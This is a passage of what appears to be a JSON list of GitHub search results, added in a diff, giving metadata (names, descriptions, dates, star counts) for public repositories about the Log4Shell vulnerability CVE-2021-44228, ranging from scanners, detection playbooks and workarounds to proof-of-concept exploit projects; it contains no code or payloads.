+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440663893,
+ "name": "log4j-cve-2021-44228",
+ "full_name": "lucab85\/log4j-cve-2021-44228",
+ "owner": {
+ "login": "lucab85",
+ "id": 24267107,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24267107?v=4",
+ "html_url": "https:\/\/github.com\/lucab85"
+ },
+ "html_url": "https:\/\/github.com\/lucab85\/log4j-cve-2021-44228",
+ "description": "Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 Remote Code Execution - log4j (CVE-2021-44228)",
+ "fork": false,
+ "created_at": "2021-12-21T22:14:24Z",
+ "updated_at": "2023-12-20T18:56:50Z",
+ "pushed_at": "2022-01-10T19:13:04Z",
+ "stargazers_count": 56,
+ "watchers_count": 56,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "ansible",
+ "cve-2021-44228",
+ "devsecops",
+ "log4j",
+ "log4shell",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 56,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 440722343,
+ "name": "Log4Shell-CVE-2021-44228-Demo",
+ "full_name": "BabooPan\/Log4Shell-CVE-2021-44228-Demo",
+ "owner": {
+ "login": "BabooPan",
+ "id": 16317991,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16317991?v=4",
+ "html_url": "https:\/\/github.com\/BabooPan"
+ },
+ "html_url": "https:\/\/github.com\/BabooPan\/Log4Shell-CVE-2021-44228-Demo",
+ "description": "Log4Shell Demo with AWS",
+ "fork": false,
+ "created_at": "2021-12-22T03:34:40Z",
+ "updated_at": "2024-03-12T11:31:53Z",
+ "pushed_at": "2022-03-28T06:49:06Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440788757,
+ "name": "log4shell_sentinel",
+ "full_name": "ossie-git\/log4shell_sentinel",
+ "owner": {
+ "login": "ossie-git",
+ "id": 25382296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25382296?v=4",
+ "html_url": "https:\/\/github.com\/ossie-git"
+ },
+ "html_url": "https:\/\/github.com\/ossie-git\/log4shell_sentinel",
+ "description": "A Smart Log4Shell\/Log4j\/CVE-2021-44228 Scanner",
+ "fork": false,
+ "created_at": "2021-12-22T08:35:04Z",
+ "updated_at": "2022-10-29T09:47:49Z",
+ "pushed_at": "2021-12-22T08:40:58Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440799948,
+ "name": "Log4Shell",
+ "full_name": "r00thunter\/Log4Shell",
+ "owner": {
+ "login": "r00thunter",
+ "id": 33806985,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33806985?v=4",
+ "html_url": "https:\/\/github.com\/r00thunter"
+ },
+ "html_url": "https:\/\/github.com\/r00thunter\/Log4Shell",
+ "description": "Generic Scanner for Apache log4j RCE CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-22T09:15:47Z",
+ "updated_at": "2024-04-07T09:48:27Z",
+ "pushed_at": "2021-12-22T09:19:15Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440816228,
+ "name": "cve-2021-44228-fix-jars",
+ "full_name": "asyzdykov\/cve-2021-44228-fix-jars",
+ "owner": {
+ "login": "asyzdykov",
+ "id": 1106604,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1106604?v=4",
+ "html_url": "https:\/\/github.com\/asyzdykov"
+ },
+ "html_url": "https:\/\/github.com\/asyzdykov\/cve-2021-44228-fix-jars",
+ "description": "CVE-2021-44228-FIX-JARS",
+ "fork": false,
+ "created_at": "2021-12-22T10:16:22Z",
+ "updated_at": "2021-12-23T09:04:57Z",
+ "pushed_at": "2021-12-23T09:04:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 440932687,
+ "name": "log4j-scanner",
+ "full_name": "BJLIYANLIANG\/log4j-scanner",
+ "owner": {
+ "login": "BJLIYANLIANG",
+ "id": 34064679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34064679?v=4",
+ "html_url": "https:\/\/github.com\/BJLIYANLIANG"
+ },
+ "html_url": "https:\/\/github.com\/BJLIYANLIANG\/log4j-scanner",
+ "description": "Log4j 2 (CVE-2021-44228) vulnerability scanner for Windows OS",
+ "fork": false,
+ "created_at": "2021-12-22T17:17:59Z",
+ "updated_at": "2021-12-24T00:57:34Z",
+ "pushed_at": "2021-12-19T01:59:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441001904,
+ "name": "Apache-Log4j-POC",
+ "full_name": "badb33f\/Apache-Log4j-POC",
+ "owner": {
+ "login": "badb33f",
+ "id": 61085462,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61085462?v=4",
+ "html_url": "https:\/\/github.com\/badb33f"
+ },
+ "html_url": "https:\/\/github.com\/badb33f\/Apache-Log4j-POC",
+ "description": "Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-22T22:44:07Z",
+ "updated_at": "2023-04-06T19:12:21Z",
+ "pushed_at": "2021-12-22T22:51:12Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441034050,
+ "name": "CVE-2021-44228-log4jVulnScanner-metasploit",
+ "full_name": "TaroballzChen\/CVE-2021-44228-log4jVulnScanner-metasploit",
+ "owner": {
+ "login": "TaroballzChen",
+ "id": 27862593,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4",
+ "html_url": "https:\/\/github.com\/TaroballzChen"
+ },
+ "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2021-44228-log4jVulnScanner-metasploit",
+ "description": "open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability",
+ "fork": false,
+ "created_at": "2021-12-23T01:59:03Z",
+ "updated_at": "2023-09-28T11:34:22Z",
+ "pushed_at": "2021-12-23T07:40:13Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 441188076,
+ "name": "ansible-role-log4shell",
+ "full_name": "lucab85\/ansible-role-log4shell",
+ "owner": {
+ "login": "lucab85",
+ "id": 24267107,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24267107?v=4",
+ "html_url": "https:\/\/github.com\/lucab85"
+ },
+ "html_url": "https:\/\/github.com\/lucab85\/ansible-role-log4shell",
+ "description": "Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228).",
+ "fork": false,
+ "created_at": "2021-12-23T13:24:41Z",
+ "updated_at": "2023-05-13T06:51:06Z",
+ "pushed_at": "2022-01-10T22:21:34Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "devsecops",
+ "log4j",
+ "log4shell",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 441364313,
+ "name": "log4j-CVE-2021-44228-workaround",
+ "full_name": "grimch\/log4j-CVE-2021-44228-workaround",
+ "owner": {
+ "login": "grimch",
+ "id": 58831200,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58831200?v=4",
+ "html_url": "https:\/\/github.com\/grimch"
+ },
+ "html_url": "https:\/\/github.com\/grimch\/log4j-CVE-2021-44228-workaround",
+ "description": "general purpose workaround for the log4j CVE-2021-44228 vulnerability",
+ "fork": false,
+ "created_at": "2021-12-24T04:23:17Z",
+ "updated_at": "2021-12-24T13:35:26Z",
+ "pushed_at": "2021-12-24T13:35:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441423344,
+ "name": "log4j-shell-csw",
+ "full_name": "cybersecurityworks553\/log4j-shell-csw",
+ "owner": {
+ "login": "cybersecurityworks553",
+ "id": 63910792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4",
+ "html_url": "https:\/\/github.com\/cybersecurityworks553"
+ },
+ "html_url": "https:\/\/github.com\/cybersecurityworks553\/log4j-shell-csw",
+ "description": "A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-24T09:26:38Z",
+ "updated_at": "2024-02-26T06:42:44Z",
+ "pushed_at": "2021-12-24T10:16:10Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441453543,
+ "name": "log4j-scan",
+ "full_name": "Toolsec\/log4j-scan",
+ "owner": {
+ "login": "Toolsec",
+ "id": 76109742,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76109742?v=4",
+ "html_url": "https:\/\/github.com\/Toolsec"
+ },
+ "html_url": "https:\/\/github.com\/Toolsec\/log4j-scan",
+ "description": "CVE-2021-44228 检查工具",
+ "fork": false,
+ "created_at": "2021-12-24T11:54:21Z",
+ "updated_at": "2022-05-09T13:18:05Z",
+ "pushed_at": "2021-12-24T02:39:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 441470836,
+ "name": "Log4jUnifi",
+ "full_name": "puzzlepeaches\/Log4jUnifi",
+ "owner": {
+ "login": "puzzlepeaches",
+ "id": 8538866,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8538866?v=4",
+ "html_url": "https:\/\/github.com\/puzzlepeaches"
+ },
+ "html_url": "https:\/\/github.com\/puzzlepeaches\/Log4jUnifi",
+ "description": "Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more.",
+ "fork": false,
+ "created_at": "2021-12-24T13:18:49Z",
+ "updated_at": "2024-05-19T15:02:08Z",
+ "pushed_at": "2024-01-04T17:12:05Z",
+ "stargazers_count": 136,
+ "watchers_count": 136,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 136,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 441536293,
+ "name": "apache-tomcat-log4j",
+ "full_name": "many-fac3d-g0d\/apache-tomcat-log4j",
+ "owner": {
+ "login": "many-fac3d-g0d",
+ "id": 54078651,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54078651?v=4",
+ "html_url": "https:\/\/github.com\/many-fac3d-g0d"
+ },
+ "html_url": "https:\/\/github.com\/many-fac3d-g0d\/apache-tomcat-log4j",
+ "description": "Log4j2 CVE-2021-44228 Vulnerability POC in Apache Tomcat",
+ "fork": false,
+ "created_at": "2021-12-24T18:54:46Z",
+ "updated_at": "2023-07-29T23:22:45Z",
+ "pushed_at": "2021-12-24T18:57:32Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441540913,
+ "name": "CVE-2021-44228",
+ "full_name": "marcourbano\/CVE-2021-44228",
+ "owner": {
+ "login": "marcourbano",
+ "id": 22402683,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22402683?v=4",
+ "html_url": "https:\/\/github.com\/marcourbano"
+ },
+ "html_url": "https:\/\/github.com\/marcourbano\/CVE-2021-44228",
+ "description": "PoC for CVE-2021-44228.",
+ "fork": false,
+ "created_at": "2021-12-24T19:26:36Z",
+ "updated_at": "2024-04-19T14:48:49Z",
+ "pushed_at": "2022-09-22T19:16:07Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 441545718,
+ "name": "log4shell-vulnerable-app",
+ "full_name": "bsigouin\/log4shell-vulnerable-app",
+ "owner": {
+ "login": "bsigouin",
+ "id": 48130586,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48130586?v=4",
+ "html_url": "https:\/\/github.com\/bsigouin"
+ },
+ "html_url": "https:\/\/github.com\/bsigouin\/log4shell-vulnerable-app",
+ "description": "Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.",
+ "fork": false,
+ "created_at": "2021-12-24T20:00:12Z",
+ "updated_at": "2022-01-06T13:31:29Z",
+ "pushed_at": "2023-01-20T17:03:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 441678815,
+ "name": "XSYS-Log4J2Shell-Ex",
+ "full_name": "ToxicEnvelope\/XSYS-Log4J2Shell-Ex",
+ "owner": {
+ "login": "ToxicEnvelope",
+ "id": 23465872,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23465872?v=4",
+ "html_url": "https:\/\/github.com\/ToxicEnvelope"
+ },
+ "html_url": "https:\/\/github.com\/ToxicEnvelope\/XSYS-Log4J2Shell-Ex",
+ "description": "this repository contains a POC of CVE-2021-44228 (log4j2shell) as part of a security research",
+ "fork": false,
+ "created_at": "2021-12-25T12:53:13Z",
+ "updated_at": "2021-12-27T20:08:44Z",
+ "pushed_at": "2021-12-27T20:08:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 442033629,
+ "name": "ModSec-log4j2",
+ "full_name": "felipe8398\/ModSec-log4j2",
+ "owner": {
+ "login": "felipe8398",
+ "id": 24979677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24979677?v=4",
+ "html_url": "https:\/\/github.com\/felipe8398"
+ },
+ "html_url": "https:\/\/github.com\/felipe8398\/ModSec-log4j2",
+ "description": "Regra ModSec para proteção log4j2 - CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-27T02:53:24Z",
+ "updated_at": "2022-06-19T02:08:13Z",
+ "pushed_at": "2022-03-10T22:09:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "docker"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442071358,
+ "name": "Log4j_Attacker_IPList",
+ "full_name": "ceyhuncamli\/Log4j_Attacker_IPList",
+ "owner": {
+ "login": "ceyhuncamli",
+ "id": 57198926,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57198926?v=4",
+ "html_url": "https:\/\/github.com\/ceyhuncamli"
+ },
+ "html_url": "https:\/\/github.com\/ceyhuncamli\/Log4j_Attacker_IPList",
+ "description": "CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-27T06:29:12Z",
+ "updated_at": "2021-12-27T06:34:21Z",
+ "pushed_at": "2021-12-27T06:34:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442073643,
+ "name": "log4j-vulnerability",
+ "full_name": "mazhar-hassan\/log4j-vulnerability",
+ "owner": {
+ "login": "mazhar-hassan",
+ "id": 32394814,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32394814?v=4",
+ "html_url": "https:\/\/github.com\/mazhar-hassan"
+ },
+ "html_url": "https:\/\/github.com\/mazhar-hassan\/log4j-vulnerability",
+ "description": "Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j",
+ "fork": false,
+ "created_at": "2021-12-27T06:39:40Z",
+ "updated_at": "2021-12-27T09:33:39Z",
+ "pushed_at": "2022-08-23T13:47:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442118241,
+ "name": "VTI-IOCs-CVE-2021-44228",
+ "full_name": "xungzzz\/VTI-IOCs-CVE-2021-44228",
+ "owner": {
+ "login": "xungzzz",
+ "id": 78672731,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78672731?v=4",
+ "html_url": "https:\/\/github.com\/xungzzz"
+ },
+ "html_url": "https:\/\/github.com\/xungzzz\/VTI-IOCs-CVE-2021-44228",
+ "description": "IOCs for CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-27T09:51:13Z",
+ "updated_at": "2021-12-27T09:51:13Z",
+ "pushed_at": "2021-12-27T09:51:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442217104,
+ "name": "l4s_poc",
+ "full_name": "s-retlaw\/l4s_poc",
+ "owner": {
+ "login": "s-retlaw",
+ "id": 73955369,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73955369?v=4",
+ "html_url": "https:\/\/github.com\/s-retlaw"
+ },
+ "html_url": "https:\/\/github.com\/s-retlaw\/l4s_poc",
+ "description": "Log4Shell (Cve-2021-44228) Proof Of Concept",
+ "fork": false,
+ "created_at": "2021-12-27T16:45:58Z",
+ "updated_at": "2022-01-04T14:50:09Z",
+ "pushed_at": "2023-07-25T20:05:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 442222189,
+ "name": "CVE-2021-44228-Apache-Log4j-Rce-main",
+ "full_name": "Ravid-CheckMarx\/CVE-2021-44228-Apache-Log4j-Rce-main",
+ "owner": {
+ "login": "Ravid-CheckMarx",
+ "id": 84515813,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84515813?v=4",
+ "html_url": "https:\/\/github.com\/Ravid-CheckMarx"
+ },
+ "html_url": "https:\/\/github.com\/Ravid-CheckMarx\/CVE-2021-44228-Apache-Log4j-Rce-main",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-27T17:06:26Z",
+ "updated_at": "2021-12-28T08:39:10Z",
+ "pushed_at": "2021-12-27T17:06:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442235397,
+ "name": "log4j-payload-generator",
+ "full_name": "yesspider-hacker\/log4j-payload-generator",
+ "owner": {
+ "login": "yesspider-hacker",
+ "id": 76931387,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76931387?v=4",
+ "html_url": "https:\/\/github.com\/yesspider-hacker"
+ },
+ "html_url": "https:\/\/github.com\/yesspider-hacker\/log4j-payload-generator",
+ "description": "log4j-paylaod generator : A generic payload generator for Apache log4j RCE CVE-2021-44228",
+ "fork": false,
+ "created_at": "2021-12-27T18:02:15Z",
+ "updated_at": "2023-01-08T10:49:19Z",
+ "pushed_at": "2021-12-27T18:38:10Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 442255773,
+ "name": "log4shell_scanner",
+ "full_name": "LinkMJB\/log4shell_scanner",
+ "owner": {
+ "login": "LinkMJB",
+ "id": 8824103,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8824103?v=4",
+ "html_url": "https:\/\/github.com\/LinkMJB"
+ },
+ "html_url": "https:\/\/github.com\/LinkMJB\/log4shell_scanner",
+ "description": "Quick and dirty scanner, hitting common ports looking for Log4Shell (CVE-2021-44228) vulnerability",
+ "fork": false,
+ "created_at": "2021-12-27T19:36:29Z",
+ "updated_at": "2021-12-27T19:40:45Z",
+ "pushed_at": "2021-12-27T19:40:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 442317732,
+ "name": "Vm4J",
+ "full_name": "NS-Sp4ce\/Vm4J",
+ "owner": {
+ "login": "NS-Sp4ce",
+ "id": 33349032,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33349032?v=4",
+ "html_url": "https:\/\/github.com\/NS-Sp4ce"
+ },
+ "html_url": "https:\/\/github.com\/NS-Sp4ce\/Vm4J",
+ "description": "A tool for detect&exploit vmware product log4j(cve-2021-44228) vulnerability.Support VMware HCX\/vCenter\/NSX\/Horizon\/vRealize Operations Manager",
+ "fork": false,
+ "created_at": "2021-12-28T01:37:20Z",
+ "updated_at": "2024-06-21T00:09:44Z",
+ "pushed_at": "2022-01-24T05:37:34Z",
+ "stargazers_count": 200,
+ "watchers_count": 200,
+ "has_discussions": false,
+ "forks_count": 37,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-44228",
+ "log4j2-exp",
+ "log4shell",
+ "vmsa-2021-0028"
+ ],
+ "visibility": "public",
+ "forks": 37,
+ "watchers": 200,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 442533490,
+ "name": "LogJackFix",
+ "full_name": "PoneyClairDeLune\/LogJackFix",
+ "owner": {
+ "login": "PoneyClairDeLune",
+ "id": 88174309,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88174309?v=4",
+ "html_url": "https:\/\/github.com\/PoneyClairDeLune"
+ },
+ "html_url": "https:\/\/github.com\/PoneyClairDeLune\/LogJackFix",
+ "description": "A spigot plugin to fix CVE-2021-44228 Log4j remote code execution vulnerability, to protect Minecraft clients.",
+ "fork": false,
+ "created_at": "2021-12-28T17:18:13Z",
+ "updated_at": "2021-12-28T17:26:16Z",
+ "pushed_at": "2021-12-28T17:26:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 443163405,
+ "name": "log4j-vulnerability",
+ "full_name": "MarceloLeite2604\/log4j-vulnerability",
+ "owner": {
+ "login": "MarceloLeite2604",
+ "id": 13152452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13152452?v=4",
+ "html_url": "https:\/\/github.com\/MarceloLeite2604"
+ },
+ "html_url": "https:\/\/github.com\/MarceloLeite2604\/log4j-vulnerability",
+ "description": "Presents how to exploit CVE-2021-44228 vulnerability.",
+ "fork": false,
+ "created_at": "2021-12-30T19:10:21Z",
+ "updated_at": "2023-08-15T12:50:39Z",
+ "pushed_at": "2022-01-03T17:14:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 443422203,
+ "name": "log4shell-vulnerable-app",
+ "full_name": "romanutti\/log4shell-vulnerable-app",
+ "owner": {
+ "login": "romanutti",
+ "id": 36601005,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36601005?v=4",
+ "html_url": "https:\/\/github.com\/romanutti"
+ },
+ "html_url": "https:\/\/github.com\/romanutti\/log4shell-vulnerable-app",
+ "description": "This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, known as log4shell.",
+ "fork": false,
+ "created_at": "2021-12-31T20:39:44Z",
+ "updated_at": "2022-01-01T10:57:33Z",
+ "pushed_at": "2022-05-10T17:20:17Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 443563564,
+ "name": "-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd.",
+ "full_name": "marklindsey11\/-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd.",
+ "owner": {
+ "login": "marklindsey11",
+ "id": 81498475,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81498475?v=4",
+ "html_url": "https:\/\/github.com\/marklindsey11"
+ },
+ "html_url": "https:\/\/github.com\/marklindsey11\/-CVE-2021-44228_scanner-Applications-that-are-vulnerable-to-the-log4j-CVE-2021-44228-https-nvd.",
+ "description": "Log4j Vulnerability Scanner",
+ "fork": false,
+ "created_at": "2022-01-01T15:13:22Z",
